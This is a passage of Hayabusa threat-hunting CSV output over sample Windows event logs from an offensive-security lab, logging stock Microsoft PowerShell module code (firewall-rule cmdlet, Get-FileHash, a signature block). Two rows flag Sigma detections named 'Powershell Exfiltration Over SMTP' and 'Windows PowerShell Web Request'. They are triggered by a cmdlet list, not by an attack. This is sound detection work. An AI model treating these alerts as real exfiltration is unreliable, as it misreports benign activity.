$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.598 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.598 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", ""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", 
""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285758' }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed 
crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # 
gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # 
EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # 
V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # 
IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # 